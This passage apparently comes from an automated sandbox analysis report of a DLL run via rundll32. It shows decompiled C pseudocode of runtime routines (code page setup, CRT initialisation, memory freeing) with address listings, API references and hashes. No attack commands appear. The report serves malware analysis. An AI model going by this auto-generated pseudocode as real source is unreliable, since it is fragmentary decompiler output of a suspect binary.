												 *_t77 =  *_t77 | 0x00000008;
												_t77 =  &(_t77[1]);
												_t87 = _t87 - 1;
												__eflags = _t87;
											} while (_t87 != 0);
											_t26 = _t96 + 4; // 0xc033a47d
											 *((intOrPtr*)(_t96 + 0x21c)) = E6E77FD1E( *_t26);
											_t93 = 1;
										}
										goto L8;
									}
								} else {
									 *(_t96 + 4) = 0xfde9;
									 *((intOrPtr*)(_t96 + 0x21c)) = _t93;
									 *((intOrPtr*)(_t96 + 0x18)) = _t93;
									 *((short*)(_t96 + 0x1c)) = _t93;
									L8:
									 *((intOrPtr*)(_t96 + 8)) = _t93;
									_t12 = _t96 + 0xc; // 0x6e77dfb8
									_t93 = _t12;
									asm("stosd");
									asm("stosd");
									asm("stosd");
									L9:
									E6E77FE32(_t91, _t96); // executed
									L37:
								}
							}
						}
						goto L38;
					}
					_t28 = _t96 + 0x18; // 0x6e77dfc4
					E6E779DB0(_t93, _t28, _t93, 0x101);
					_t60 = _v32 * 0x30;
					__eflags = _t60;
					_v36 = _t60;
					_t61 = _t60 + 0x6e78c618;
					_v32 = _t61;
					do {
						__eflags =  *_t61;
						_t85 = _t61;
						if( *_t61 != 0) {
							while(1) {
								_t66 = _t85[1];
								__eflags = _t66;
								if(_t66 == 0) {
									break;
								}
								_t92 =  *_t85 & 0x000000ff;
								_t67 = _t66 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t67;
									if(_t92 > _t67) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t34 = _t93 + 0x6e78c600; // 0x8040201
										 *(_t96 + _t92 + 0x19) =  *(_t96 + _t92 + 0x19) |  *_t34;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t67 = _t85[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t85 =  &(_t85[2]);
								__eflags =  *_t85;
								if( *_t85 != 0) {
									continue;
								}
								break;
							}
							_t61 = _v32;
						}
						_t93 = _t93 + 1;
						_t61 = _t61 + 8;
						_v32 = _t61;
						__eflags = _t93 - 4;
					} while (_t93 < 4);
					 *(_t96 + 4) = _t79;
					 *((intOrPtr*)(_t96 + 8)) = 1;
					 *((intOrPtr*)(_t96 + 0x21c)) = E6E77FD1E(_t79);
					_t46 = _t96 + 0xc; // 0x6e77dfb8
					_t86 = _t46;
					_t91 = _v36 + 0x6e78c60c;
					_t94 = 6;
					do {
						_t64 =  *_t91;
						_t91 = _t91 + 2;
						 *_t86 = _t64;
						_t49 = _t86 + 2; // 0x8babab84
						_t86 = _t49;
						_t94 = _t94 - 1;
						__eflags = _t94;
					} while (_t94 != 0);
					goto L9;
				}
				L38:
				return E6E778727(_t79, _v8 ^ _t97, _t90, _t93, _t96);
			}

































                                                      0x6e7801c7
                                                      0x6e7801cf
                                                      0x6e7801d6
                                                      0x6e7801db
                                                      0x6e7801e7
                                                      0x6e7801ec
                                                      0x6e7803a2
                                                      0x6e7803a3
                                                      0x00000000
                                                      0x6e7801f2
                                                      0x6e7801f2
                                                      0x6e7801f4
                                                      0x6e7801f6
                                                      0x6e7801f8
                                                      0x6e7801fb
                                                      0x6e780207
                                                      0x6e780208
                                                      0x6e78020b
                                                      0x6e780213
                                                      0x00000000
                                                      0x6e780215
                                                      0x6e78021b
                                                      0x6e7802f2
                                                      0x6e780233
                                                      0x6e78023a
                                                      0x6e780267
                                                      0x6e78026d
                                                      0x6e78026f
                                                      0x6e7802e6
                                                      0x6e7802ec
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e780271
                                                      0x6e780276
                                                      0x6e78027b
                                                      0x6e780283
                                                      0x6e780286
                                                      0x6e78028a
                                                      0x6e780290
                                                      0x6e780292
                                                      0x6e780296
                                                      0x6e780299
                                                      0x6e78029b
                                                      0x6e78029b
                                                      0x6e78029e
                                                      0x6e7802a0
                                                      0x00000000
                                                      0x00000000
                                                      0x6e7802a2
                                                      0x6e7802a5
                                                      0x6e7802b0
                                                      0x6e7802b0
                                                      0x6e7802b2
                                                      0x00000000
                                                      0x00000000
                                                      0x6e7802aa
                                                      0x6e7802af
                                                      0x6e7802af
                                                      0x6e7802af
                                                      0x6e7802b4
                                                      0x6e7802b7
                                                      0x6e7802ba
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e7802ba
                                                      0x6e78029b
                                                      0x6e7802bc
                                                      0x6e7802bc
                                                      0x6e7802bc
                                                      0x6e7802bf
                                                      0x6e7802c4
                                                      0x6e7802c4
                                                      0x6e7802c7
                                                      0x6e7802c8
                                                      0x6e7802c8
                                                      0x6e7802c8
                                                      0x6e7802cd
                                                      0x6e7802d7
                                                      0x6e7802e0
                                                      0x6e7802e0
                                                      0x00000000
                                                      0x6e780290
                                                      0x6e78023c
                                                      0x6e78023c
                                                      0x6e78023f
                                                      0x6e780245
                                                      0x6e780248
                                                      0x6e78024c
                                                      0x6e78024c
                                                      0x6e780251
                                                      0x6e780251
                                                      0x6e780254
                                                      0x6e780255
                                                      0x6e780256
                                                      0x6e780257
                                                      0x6e780258
                                                      0x6e7803a8
                                                      0x6e7803aa
                                                      0x6e78023a
                                                      0x6e78021b
                                                      0x00000000
                                                      0x6e780213
                                                      0x6e7802ff
                                                      0x6e780304
                                                      0x6e78030c
                                                      0x6e78030c
                                                      0x6e780310
                                                      0x6e780313
                                                      0x6e780319
                                                      0x6e78031c
                                                      0x6e78031c
                                                      0x6e78031f
                                                      0x6e780321
                                                      0x6e780323
                                                      0x6e780323
                                                      0x6e780326
                                                      0x6e780328
                                                      0x00000000
                                                      0x00000000
                                                      0x6e78032a
                                                      0x6e78032d
                                                      0x6e780349
                                                      0x6e780349
                                                      0x6e78034b
                                                      0x00000000
                                                      0x00000000
                                                      0x6e780332
                                                      0x6e780338
                                                      0x6e78033a
                                                      0x6e780340
                                                      0x6e780344
                                                      0x6e780344
                                                      0x6e780345
                                                      0x00000000
                                                      0x6e780345
                                                      0x00000000
                                                      0x6e780338
                                                      0x6e78034d
                                                      0x6e780350
                                                      0x6e780353
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e780353
                                                      0x6e780355
                                                      0x6e780355
                                                      0x6e780358
                                                      0x6e780359
                                                      0x6e78035c
                                                      0x6e78035f
                                                      0x6e78035f
                                                      0x6e780365
                                                      0x6e780368
                                                      0x6e780377
                                                      0x6e780380
                                                      0x6e780380
                                                      0x6e780385
                                                      0x6e78038b
                                                      0x6e78038c
                                                      0x6e78038c
                                                      0x6e78038f
                                                      0x6e780392
                                                      0x6e780395
                                                      0x6e780395
                                                      0x6e780398
                                                      0x6e780398
                                                      0x6e780398
                                                      0x00000000
                                                      0x6e78039d
                                                      0x6e7803ab
                                                      0x6e7803b9

                                                      APIs
                                                        • Part of subcall function 6E77FD5C: GetOEMCP.KERNEL32(00000000,6E77FFCE,6E77DFAC,00000000,00000000,00000000,00000000,?,6E77DFAC), ref: 6E77FD87
                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,6E780015,?,00000000,6E77DFAC,558B0000,?,?,?,?,00000000), ref: 6E780225
                                                      • GetCPInfo.KERNEL32(00000000,6E780015,?,?,6E780015,?,00000000,6E77DFAC,558B0000,?,?,?,?,00000000,00000000), ref: 6E780267
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: CodeInfoPageValid
                                                      • String ID:
                                                      • API String ID: 546120528-0
                                                      • Opcode ID: 954f82080392cbdc00a77128786b31e03da1f5f8b4a6b0cee7175440ebc30109
                                                      • Instruction ID: c9c3c8f8d3b2fecdf9051df021c9d5b4c842ec9dd895030d6bca96a7f8732d2a
                                                      • Opcode Fuzzy Hash: 954f82080392cbdc00a77128786b31e03da1f5f8b4a6b0cee7175440ebc30109
                                                      • Instruction Fuzzy Hash: 21513570A017059FFB258FB6C6506ABBBF9EF72304F20447EC0969B661E37491458F91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77FFB3, Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E6E77FFB3(signed int __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				void* _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __ebp;
				char _t39;
				signed int _t44;
				char _t48;
				char _t51;
				char _t58;
				signed int _t64;
				void* _t75;
				void* _t80;
				signed int _t85;

				_t78 = __edx;
				_push(_a16);
				_push(_a12);
				E6E7800CC(__ebx, __edx, __edi, __esi, __eflags);
				_t39 = E6E77FD5C(__eflags, _a4);
				_v16 = _t39;
				if(_t39 !=  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					_t80 = E6E77E9C4(0x220);
					_t64 = __ebx | 0xffffffff;
					__eflags = _t80;
					if(__eflags == 0) {
						L5:
						_t85 = _t64;
					} else {
						_t80 = memcpy(_t80,  *(_a12 + 0x48), 0x88 << 2);
						 *_t80 =  *_t80 & 0x00000000; // executed
						_t44 = E6E7801C7(_t78, __eflags, _v16, _t80); // executed
						_t85 = _t44;
						__eflags = _t85 - _t64;
						if(__eflags != 0) {
							__eflags = _a8;
							if(_a8 == 0) {
								E6E77F1F2();
							}
							asm("lock xadd [eax], ebx");
							_t66 = _t64 == 1;
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								_t58 = _a12;
								__eflags =  *((intOrPtr*)(_t58 + 0x48)) - 0x6e78c1d8;
								if( *((intOrPtr*)(_t58 + 0x48)) != 0x6e78c1d8) {
									E6E77D646( *((intOrPtr*)(_t58 + 0x48)));
								}
							}
							 *_t80 = 1;
							_t75 = _t80;
							_t80 = 0;
							 *(_a12 + 0x48) = _t75;
							_t48 = _a12;
							__eflags =  *(_t48 + 0x350) & 0x00000002;
							if(( *(_t48 + 0x350) & 0x00000002) == 0) {
								__eflags =  *0x6e78c7f8 & 0x00000001;
								if(__eflags == 0) {
									_v24 =  &_a12;
									_v20 =  &_a16;
									_t51 = 5;
									_v16 = _t51;
									_v12 = _t51;
									_push( &_v16);
									_push( &_v24);
									_push( &_v12);
									E6E77FC4E(_t66, 0, _t85, __eflags);
									__eflags = _a8;
									if(_a8 != 0) {
										 *0x6e78c1cc =  *_a16;
									}
								}
							}
						} else {
							 *((intOrPtr*)(E6E77D59B(__eflags))) = 0x16;
							goto L5;
						}
					}
					E6E77D646(_t80);
					return _t85;
				} else {
					return 0;
				}
			}


















                                                      0x6e77ffb3
                                                      0x6e77ffbb
                                                      0x6e77ffbe
                                                      0x6e77ffc1
                                                      0x6e77ffc9
                                                      0x6e77ffd4
                                                      0x6e77ffdd
                                                      0x6e77ffe3
                                                      0x6e77ffe4
                                                      0x6e77ffe5
                                                      0x6e77fff0
                                                      0x6e77fff2
                                                      0x6e77fff6
                                                      0x6e77fff8
                                                      0x6e780028
                                                      0x6e780028
                                                      0x6e77fffa
                                                      0x6e780007
                                                      0x6e78000d
                                                      0x6e780010
                                                      0x6e780015
                                                      0x6e780019
                                                      0x6e78001b
                                                      0x6e780038
                                                      0x6e78003c
                                                      0x6e78003e
                                                      0x6e78003e
                                                      0x6e780049
                                                      0x6e78004d
                                                      0x6e78004d
                                                      0x6e78004e
                                                      0x6e780050
                                                      0x6e780053
                                                      0x6e78005a
                                                      0x6e78005f
                                                      0x6e780064
                                                      0x6e78005a
                                                      0x6e780065
                                                      0x6e78006b
                                                      0x6e780070
                                                      0x6e780072
                                                      0x6e780075
                                                      0x6e780078
                                                      0x6e78007f
                                                      0x6e780081
                                                      0x6e780088
                                                      0x6e78008d
                                                      0x6e780098
                                                      0x6e78009b
                                                      0x6e78009c
                                                      0x6e78009f
                                                      0x6e7800a5
                                                      0x6e7800a9
                                                      0x6e7800ad
                                                      0x6e7800ae
                                                      0x6e7800b3
                                                      0x6e7800b7
                                                      0x6e7800c2
                                                      0x6e7800c2
                                                      0x6e7800b7
                                                      0x6e780088
                                                      0x6e78001d
                                                      0x6e780022
                                                      0x00000000
                                                      0x6e780022
                                                      0x6e78001b
                                                      0x6e78002b
                                                      0x6e780037
                                                      0x6e77ffdf
                                                      0x6e77ffe2
                                                      0x6e77ffe2

                                                      APIs
                                                        • Part of subcall function 6E77FD5C: GetOEMCP.KERNEL32(00000000,6E77FFCE,6E77DFAC,00000000,00000000,00000000,00000000,?,6E77DFAC), ref: 6E77FD87
                                                      • _free.LIBCMT ref: 6E78002B
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 2ee136c920cd4b7d0abb8fc8948873ab728aabdd2e6f28d305eb8b8ad2cd8864
                                                      • Instruction ID: 65076fd4ed21657a62af64f46376462382d8b9aefffcd392ca2216817c960289
                                                      • Opcode Fuzzy Hash: 2ee136c920cd4b7d0abb8fc8948873ab728aabdd2e6f28d305eb8b8ad2cd8864
                                                      • Instruction Fuzzy Hash: 1E3190729042499FEF11DFA8DA84ADB7BBAAF45324F110479E9109B2B0EB329940CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E8039AE, Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 6E7F7D21: GetLastError.KERNEL32(00000008,6E849A90,6E80076C), ref: 6E7F7D25
                                                        • Part of subcall function 6E7F7D21: _free.LIBCMT ref: 6E7F7D58
                                                        • Part of subcall function 6E7F7D21: SetLastError.KERNEL32(00000000,6E849A00,6E849A90), ref: 6E7F7D99
                                                        • Part of subcall function 6E7F7D21: _abort.LIBCMT ref: 6E7F7D9F
                                                        • Part of subcall function 6E803ACD: _abort.LIBCMT ref: 6E803AFF
                                                        • Part of subcall function 6E803ACD: _free.LIBCMT ref: 6E803B33
                                                        • Part of subcall function 6E803742: GetOEMCP.KERNEL32(00000000,?,?,6E8039CB,?), ref: 6E80376D
                                                      • _free.LIBCMT ref: 6E803A26
                                                      • _free.LIBCMT ref: 6E803A5C
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorLast_abort
                                                      • String ID:
                                                      • API String ID: 2991157371-0
                                                      • Opcode ID: 1af522c0a134de080abcf82cf32135907b847de12e6fe2c1fe34734bf83c0004
                                                      • Instruction ID: 45f8d3b1257573b61a45b72c1ad8a8cce4ad3a2b7e68502a56db0592fafdec39
                                                      • Opcode Fuzzy Hash: 1af522c0a134de080abcf82cf32135907b847de12e6fe2c1fe34734bf83c0004
                                                      • Instruction Fuzzy Hash: 1831A131D04609EFDB10DFEDD948F99B7B8EF41324F214999E9149B2A0EB325E41CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E778CAE, Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E6E778CAE(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t56;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				signed int _t86;
				void* _t89;
				void* _t90;
				void* _t102;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr* _t121;
				void* _t123;

				_t113 = __esi;
				_t106 = __edi;
				_t105 = __edx;
				_t89 = __ecx;
				E6E7794D0(__ebx, __edi, __esi, 0x6e78a488, 0x10);
				_t43 = E6E778A80(_t89, __edx, 0); // executed
				_pop(_t90);
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t123 - 0x1d)) = E6E778985();
					_t85 = 1;
					 *((char*)(_t123 - 0x19)) = 1;
					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
					_t132 =  *0x6e78c960;
					if( *0x6e78c960 != 0) {
						E6E7791BB(_t105, __edi, __esi, 7);
						asm("int3");
						E6E7794D0(1, __edi, __esi, 0x6e78a4a8, 0x10);
						_t48 =  *0x6e78c984; // 0x1
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x6e78c984 = _t48 - 1;
							 *(_t123 - 0x1c) = 1;
							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
							 *((char*)(_t123 - 0x20)) = E6E778985();
							 *(_t123 - 4) = 1;
							__eflags =  *0x6e78c960 - 2;
							if( *0x6e78c960 != 2) {
								E6E7791BB(_t105, 1, _t113, 7);
								asm("int3");
								E6E7794D0(1, 1, _t113, 0x6e78a4d0, 0xc);
								_t110 =  *(_t123 + 0xc);
								__eflags = _t110;
								if(_t110 != 0) {
									L23:
									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
									__eflags = _t110 - 1;
									if(_t110 == 1) {
										L26:
										_t86 =  *(_t123 + 0x10);
										_t115 = E6E778F70( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
										 *(_t123 - 0x1c) = _t115;
										__eflags = _t115;
										if(_t115 != 0) {
											_t55 = E6E778C5B(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t55;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t115;
											if(_t115 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t110 - 2;
										if(_t110 == 2) {
											goto L26;
										} else {
											_t86 =  *(_t123 + 0x10);
											L28:
											_push(_t86);
											_push(_t110);
											_push( *((intOrPtr*)(_t123 + 8)));
											_t56 = E6E7795AE();
											_t115 = _t56;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t110 - 1;
											if(_t110 == 1) {
												__eflags = _t115;
												if(_t115 == 0) {
													_push(_t86);
													_push(_t56);
													_push( *((intOrPtr*)(_t123 + 8)));
													_t59 = E6E7795AE();
													__eflags = _t86;
													_t34 = _t86 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t90);
													E6E778F70( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
												}
											}
											__eflags = _t110;
											if(_t110 == 0) {
												L33:
												_t115 = E6E778C5B(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
												 *(_t123 - 0x1c) = _t115;
												__eflags = _t115;
												if(_t115 != 0) {
													_t115 = E6E778F70( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
													 *(_t123 - 0x1c) = _t115;
												}
											} else {
												__eflags = _t110 - 3;
												if(_t110 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t123 - 4) = 0xfffffffe;
									_t54 = _t115;
								} else {
									__eflags =  *0x6e78c984 - _t110; // 0x1
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
								return _t54;
							} else {
								E6E778A50(1, _t90, 1, _t113);
								E6E7795C0();
								E6E779621();
								 *0x6e78c960 =  *0x6e78c960 & 0x00000000;
								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
								E6E778E4A();
								_t67 = E6E778BF1(_t90,  *((intOrPtr*)(_t123 + 8)), 0);
								asm("sbb esi, esi");
								_t119 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t119;
								 *(_t123 - 0x1c) = _t119;
								 *(_t123 - 4) = 0xfffffffe;
								E6E778E57();
								_t69 = _t119;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
							return _t69;
						}
					} else {
						 *0x6e78c960 = 1;
						if(E6E7789E2(_t132) != 0) {
							E6E7795B4(E6E7795F5());
							E6E7795D2();
							_t80 = E6E77D144(0x6e785154, 0x6e785168);
							_pop(_t102);
							if(_t80 == 0 && E6E7789B7(1, _t102) != 0) {
								E6E77D0FF(_t102, 0x6e78514c, 0x6e785150);
								 *0x6e78c960 = 2;
								_t85 = 0;
								 *((char*)(_t123 - 0x19)) = 0;
							}
						}
						 *(_t123 - 4) = 0xfffffffe;
						E6E778D91();
						if(_t85 != 0) {
							goto L11;
						} else {
							_t121 = E6E7795EF();
							_t138 =  *_t121;
							if( *_t121 != 0) {
								_push(_t121);
								if(E6E778B40(_t85, _t106, _t121, _t138) != 0) {
									 *0x6e785148( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
									 *((intOrPtr*)( *_t121))();
								}
							}
							 *0x6e78c984 =  *0x6e78c984 + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
						return _t44;
					}
				}
			}






















                                                      0x6e778cae
                                                      0x6e778cae
                                                      0x6e778cae
                                                      0x6e778cae
                                                      0x6e778cb5
                                                      0x6e778cbc
                                                      0x6e778cc1
                                                      0x6e778cc4
                                                      0x6e778d9b
                                                      0x6e778d9b
                                                      0x6e778d9b
                                                      0x00000000
                                                      0x6e778cca
                                                      0x6e778ccf
                                                      0x6e778cd2
                                                      0x6e778cd4
                                                      0x6e778cd7
                                                      0x6e778cdb
                                                      0x6e778ce2
                                                      0x6e778daf
                                                      0x6e778db4
                                                      0x6e778dbc
                                                      0x6e778dc1
                                                      0x6e778dc6
                                                      0x6e778dc8
                                                      0x6e778dcf
                                                      0x6e778dd7
                                                      0x6e778dda
                                                      0x6e778de3
                                                      0x6e778de6
                                                      0x6e778de9
                                                      0x6e778df0
                                                      0x6e778e5f
                                                      0x6e778e64
                                                      0x6e778e6c
                                                      0x6e778e71
                                                      0x6e778e74
                                                      0x6e778e76
                                                      0x6e778e87
                                                      0x6e778e87
                                                      0x6e778e8b
                                                      0x6e778e8e
                                                      0x6e778e9a
                                                      0x6e778e9a
                                                      0x6e778ea7
                                                      0x6e778ea9
                                                      0x6e778eac
                                                      0x6e778eae
                                                      0x6e778eb9
                                                      0x6e778ebe
                                                      0x6e778ec0
                                                      0x6e778ec3
                                                      0x6e778ec5
                                                      0x00000000
                                                      0x00000000
                                                      0x6e778ec5
                                                      0x6e778e90
                                                      0x6e778e90
                                                      0x6e778e93
                                                      0x00000000
                                                      0x6e778e95
                                                      0x6e778e95
                                                      0x6e778ecb
                                                      0x6e778ecb
                                                      0x6e778ecc
                                                      0x6e778ecd
                                                      0x6e778ed0
                                                      0x6e778ed5
                                                      0x6e778ed7
                                                      0x6e778eda
                                                      0x6e778edd
                                                      0x6e778edf
                                                      0x6e778ee1
                                                      0x6e778ee3
                                                      0x6e778ee4
                                                      0x6e778ee5
                                                      0x6e778ee8
                                                      0x6e778eed
                                                      0x6e778eef
                                                      0x6e778eef
                                                      0x6e778ef5
                                                      0x6e778ef6
                                                      0x6e778efb
                                                      0x6e778f01
                                                      0x6e778f01
                                                      0x6e778ee1
                                                      0x6e778f06
                                                      0x6e778f08
                                                      0x6e778f0f
                                                      0x6e778f19
                                                      0x6e778f1b
                                                      0x6e778f1e
                                                      0x6e778f20
                                                      0x6e778f2c
                                                      0x6e778f54
                                                      0x6e778f54
                                                      0x6e778f0a
                                                      0x6e778f0a
                                                      0x6e778f0d
                                                      0x00000000
                                                      0x00000000
                                                      0x6e778f0d
                                                      0x6e778f08
                                                      0x6e778e93
                                                      0x6e778f57
                                                      0x6e778f5e
                                                      0x6e778e78
                                                      0x6e778e78
                                                      0x6e778e7e
                                                      0x00000000
                                                      0x6e778e80
                                                      0x6e778e80
                                                      0x6e778e80
                                                      0x6e778e7e
                                                      0x6e778f63
                                                      0x6e778f6f
                                                      0x6e778df2
                                                      0x6e778df2
                                                      0x6e778df7
                                                      0x6e778dfc
                                                      0x6e778e01
                                                      0x6e778e08
                                                      0x6e778e0c
                                                      0x6e778e16
                                                      0x6e778e22
                                                      0x6e778e24
                                                      0x6e778e24
                                                      0x6e778e26
                                                      0x6e778e29
                                                      0x6e778e30
                                                      0x6e778e35
                                                      0x00000000
                                                      0x6e778e35
                                                      0x6e778dca
                                                      0x6e778dca
                                                      0x6e778e37
                                                      0x6e778e3a
                                                      0x6e778e46
                                                      0x6e778e46
                                                      0x6e778ce8
                                                      0x6e778ce8
                                                      0x6e778cf9
                                                      0x6e778d00
                                                      0x6e778d05
                                                      0x6e778d14
                                                      0x6e778d1a
                                                      0x6e778d1d
                                                      0x6e778d32
                                                      0x6e778d39
                                                      0x6e778d43
                                                      0x6e778d45
                                                      0x6e778d45
                                                      0x6e778d1d
                                                      0x6e778d48
                                                      0x6e778d4f
                                                      0x6e778d56
                                                      0x00000000
                                                      0x6e778d58
                                                      0x6e778d5d
                                                      0x6e778d5f
                                                      0x6e778d62
                                                      0x6e778d64
                                                      0x6e778d6d
                                                      0x6e778d7b
                                                      0x6e778d81
                                                      0x6e778d81
                                                      0x6e778d6d
                                                      0x6e778d83
                                                      0x6e778d8b
                                                      0x6e778d8b
                                                      0x6e778d9d
                                                      0x6e778da0
                                                      0x6e778dac
                                                      0x6e778dac
                                                      0x6e778ce2

                                                      APIs
                                                      • __RTC_Initialize.LIBCMT ref: 6E778CFB
                                                        • Part of subcall function 6E7795B4: InitializeSListHead.KERNEL32(6E78CCB8,6E778D05,6E78A488,00000010,6E778C96,?,?,?,6E778EBE,?,00000001,?,?,00000001,?,6E78A4D0), ref: 6E7795B9
                                                      • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E778D65
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                      • String ID:
                                                      • API String ID: 3231365870-0
                                                      • Opcode ID: 80ccb59cc7a7e1ebc925d0fc40db72addefe325306deac5068def6d233cf1440
                                                      • Instruction ID: 8940a4aa7d0407ecea4cb2dbe5f0c679bb55f10917ccdd1a4f996c1165e45507
                                                      • Opcode Fuzzy Hash: 80ccb59cc7a7e1ebc925d0fc40db72addefe325306deac5068def6d233cf1440
                                                      • Instruction Fuzzy Hash: 85210E315053219AEF309FF8E7187DE37AA9F3632DF1409B9D5856B2E0DB710104CA2A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77CA37, Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E6E77CA37(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}



                                                      0x6e77ca3c

                                                      APIs
                                                        • Part of subcall function 6E780623: GetEnvironmentStringsW.KERNEL32 ref: 6E78062C
                                                        • Part of subcall function 6E780623: _free.LIBCMT ref: 6E78068B
                                                        • Part of subcall function 6E780623: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E78069A
                                                      • _free.LIBCMT ref: 6E77CA77
                                                      • _free.LIBCMT ref: 6E77CA7E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free$EnvironmentStrings$Free
                                                      • String ID:
                                                      • API String ID: 2490078468-0
                                                      • Opcode ID: f80fd0cc294c73ebe03407b403bc5a54cea020a6d4845df898b204dede89eab9
